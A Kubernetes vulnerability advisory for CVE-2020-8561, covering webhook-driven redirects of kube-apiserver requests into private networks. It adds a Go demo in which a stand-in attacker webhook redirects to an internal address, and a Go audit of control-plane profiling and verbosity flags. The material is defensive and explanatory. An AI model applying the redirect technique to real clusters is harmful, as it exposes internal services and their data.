PT-2021-6571 · Unknown · Kubernetes

Qiqi Xu

·

Published

2021-09-01

·

Updated

2026-06-01

·

CVE-2020-8561

CVSS v3.1

4.1

Medium

Vector AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N
Name of the Vulnerable Software and Affected Versions Kubernetes (affected versions not specified)
Description A security issue was discovered in Kubernetes: an actor who controls the responses of a MutatingWebhookConfiguration or ValidatingWebhookConfiguration webhook endpoint can redirect kube-apiserver requests to private networks reachable from the apiserver, because the apiserver's webhook client follows the HTTP redirect that the webhook server returns. If that actor can also read kube-apiserver logs while the log level is set to 10, the redirected responses and their headers appear in those logs, disclosing data that is otherwise reachable only from the apiserver's network position. Two privileges are therefore required, which is why the vector carries PR:H and a changed scope: the right to create or modify webhook configurations, and read access to apiserver logs at verbosity 10.
A related hardening point: kube-apiserver, kube-scheduler, kube-controller-manager and the kubelet enable profiling by default and serve the /debug/pprof/profile endpoint. On kube-apiserver, kube-controller-manager and kube-scheduler that endpoint is protected by RBAC, so reaching it requires the corresponding rights on the non-resource URL; the kubelet is configured separately.
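The redirect mechanism described above, reduced to a runnable Go illustration. This is an added example, not Kubernetes code: a stand-in transport plays both the attacker's webhook (which answers every admission request with a 302 into the apiserver's network) and a service on that private network, so nothing is sent over real sockets. The hostname webhook.attacker.example, the address 10.0.0.5 and the response bodies are constructed for the demo. The first client follows the redirect, so the private service is contacted and its body (what a verbosity-10 log would record) comes back as the webhook "response"; the second client sets CheckRedirect to http.ErrUseLastResponse and stops at the 302.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"strings"
)

// fakeNetwork is a constructed stand-in for what the apiserver's HTTP client can
// reach. It answers in-process instead of opening sockets, so the example runs
// offline; the hostname and the 10.0.0.5 address are assumptions for the demo.
type fakeNetwork struct {
	internalHits int // requests that reached the "private network" service
}

func (n *fakeNetwork) RoundTrip(req *http.Request) (*http.Response, error) {
	switch req.URL.Host {
	case "webhook.attacker.example":
		// Attacker-controlled admission webhook: instead of an AdmissionReview
		// it answers with a 302 pointing into the apiserver's private network.
		return textResponse(req, http.StatusFound, "", "http://10.0.0.5/secret"), nil
	case "10.0.0.5":
		// Service reachable only from the apiserver's network position.
		n.internalHits++
		return textResponse(req, http.StatusOK, "internal-only response", ""), nil
	default:
		return nil, fmt.Errorf("unexpected host %q", req.URL.Host)
	}
}

// textResponse builds a minimal response; location, when non-empty, becomes
// the Location header that a redirect-following client will act on.
func textResponse(req *http.Request, status int, body, location string) *http.Response {
	resp := &http.Response{
		StatusCode:    status,
		Proto:         "HTTP/1.1",
		ProtoMajor:    1,
		ProtoMinor:    1,
		Header:        make(http.Header),
		Body:          io.NopCloser(strings.NewReader(body)),
		ContentLength: int64(len(body)),
		Request:       req,
	}
	if location != "" {
		resp.Header.Set("Location", location)
	}
	return resp
}

// Outcome is what the apiserver-side client ended up with after one webhook call.
type Outcome struct {
	Status       int
	Body         string // at -v=10 this is what the apiserver log would record
	InternalHits int
}

// followingClient mirrors the vulnerable behaviour: redirects are followed.
func followingClient(n *fakeNetwork) *http.Client {
	return &http.Client{Transport: n}
}

// strictClient is the hardened variant: the 302 is returned as-is and never
// followed, so nothing on the private network is contacted.
func strictClient(n *fakeNetwork) *http.Client {
	return &http.Client{
		Transport: n,
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
}

// probe POSTs one constructed admission review to the attacker's webhook and
// reports where the client ended up.
func probe(client *http.Client, n *fakeNetwork) (Outcome, error) {
	resp, err := client.Post("http://webhook.attacker.example/mutate", "application/json",
		strings.NewReader(`{"kind":"AdmissionReview","apiVersion":"admission.k8s.io/v1"}`))
	if err != nil {
		return Outcome{}, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return Outcome{}, err
	}
	return Outcome{Status: resp.StatusCode, Body: string(body), InternalHits: n.internalHits}, nil
}

func main() {
	for _, mk := range []func(*fakeNetwork) *http.Client{followingClient, strictClient} {
		n := &fakeNetwork{}
		out, err := probe(mk(n), n)
		fmt.Printf("%+v err=%v\n", out, err)
	}
}
```

The Go client changes the redirected POST into a GET and drops the admission body, which is why the private service sees a plain GET; the point is not the method but that a request left the apiserver towards an address the webhook author chose.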
Recommendations No fixed version is listed at the time of writing. Until one is available, control the two preconditions directly: restrict the right to create or modify MutatingWebhookConfiguration and ValidatingWebhookConfiguration objects to cluster administrators, do not run kube-apiserver at log level 10 outside short-lived debugging sessions, and restrict who can read apiserver logs. Where profiling is not needed, start kube-apiserver, kube-controller-manager and kube-scheduler with --profiling=false.
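As an added example tied to the recommendations (not part of the advisory or of Kubernetes), a Go audit over the control-plane pod listing that `kubectl get pods -n kube-system -o json` produces: it flags containers running kube-apiserver, kube-controller-manager or kube-scheduler with profiling left at its default (on) or with --v at 10 or higher. The pod listing embedded below is constructed, not output from a real cluster; the kubelet is not a pod and is configured through its own flags and config file, so it is outside this check.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strconv"
	"strings"
)

// podList mirrors the fields of `kubectl get pods -n kube-system -o json` that the audit reads.
type podList struct {
	Items []struct {
		Metadata struct{ Name string `json:"name"` } `json:"metadata"`
		Spec     struct {
			Containers []struct{ Command, Args []string } `json:"containers"`
		} `json:"spec"`
	} `json:"items"`
}

// Control-plane binaries whose --profiling flag defaults to true.
var profiledComponents = []string{"kube-apiserver", "kube-controller-manager", "kube-scheduler"}

// Finding is one audit result for one control-plane container.
type Finding struct{ Pod, Component, Issue string }

// flagValue looks up --name (or -name) in argv, accepting "--name=value", "--name value"
// and a bare boolean "--name"; found is false when the flag is absent.
func flagValue(argv []string, name string) (value string, found bool) {
	for i, a := range argv {
		for _, key := range []string{"--" + name, "-" + name} {
			if strings.HasPrefix(a, key+"=") {
				return strings.TrimPrefix(a, key+"="), true
			}
			if a == key {
				if i+1 < len(argv) && !strings.HasPrefix(argv[i+1], "-") {
					return argv[i+1], true
				}
				return "", true // bare boolean flag
			}
		}
	}
	return "", false
}

// profilingEnabled applies the default (true) when the flag is absent or bare; an unparsable value is also treated as enabled.
func profilingEnabled(argv []string) bool {
	v, found := flagValue(argv, "profiling")
	b, err := strconv.ParseBool(v)
	return !found || v == "" || err != nil || b
}

// verbosity returns the klog level from --v / -v, 0 when absent or invalid.
func verbosity(argv []string) int {
	v, _ := flagValue(argv, "v")
	n, _ := strconv.Atoi(v)
	return n
}

// AuditControlPlane inspects every container running a known control-plane binary and reports default-on profiling and log verbosity of 10 or higher.
func AuditControlPlane(podsJSON []byte) ([]Finding, error) {
	var pl podList
	if err := json.Unmarshal(podsJSON, &pl); err != nil {
		return nil, err
	}
	var findings []Finding
	for _, pod := range pl.Items {
		for _, c := range pod.Spec.Containers {
			argv := append(append([]string{}, c.Command...), c.Args...)
			comp := ""
			for _, name := range profiledComponents {
				// argv[0] may be a bare binary name or a full path.
				if len(argv) > 0 && strings.HasSuffix("/"+argv[0], "/"+name) {
					comp = name
				}
			}
			if comp == "" {
				continue
			}
			if profilingEnabled(argv) {
				findings = append(findings, Finding{pod.Metadata.Name, comp, "profiling on (default): /debug/pprof/profile is served; set --profiling=false"})
			}
			if v := verbosity(argv); v >= 10 {
				findings = append(findings, Finding{pod.Metadata.Name, comp, fmt.Sprintf("--v=%d: webhook responses and headers are written to the log", v)})
			}
		}
	}
	return findings, nil
}

// SamplePods is a constructed kube-system listing, not output from a real cluster.
const SamplePods = `{"items":[
{"metadata":{"name":"kube-apiserver-cp1"},"spec":{"containers":[{"command":["kube-apiserver","--secure-port=6443","--v=10"]}]}},
{"metadata":{"name":"kube-controller-manager-cp1"},"spec":{"containers":[{"command":["kube-controller-manager","--profiling=false","--v=2"]}]}},
{"metadata":{"name":"kube-scheduler-cp1"},"spec":{"containers":[{"command":["/usr/local/bin/kube-scheduler"],"args":["--profiling","--v","4"]}]}}
]}`

func main() {
	findings, _ := AuditControlPlane([]byte(SamplePods))
	for _, f := range findings {
		fmt.Printf("%s (%s): %s\n", f.Pod, f.Component, f.Issue)
	}
}
```

Against the constructed listing the apiserver is reported twice (profiling defaulted on, and --v=10), the scheduler once (a bare --profiling is the same as --profiling=true), and the controller-manager not at all because it carries --profiling=false and runs at --v=2.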

Weakness Enumeration

Related Identifiers

BDU:2022-01837
CVE-2020-8561
GHSA-74J8-88MM-7496

Affected Products

Kubernetes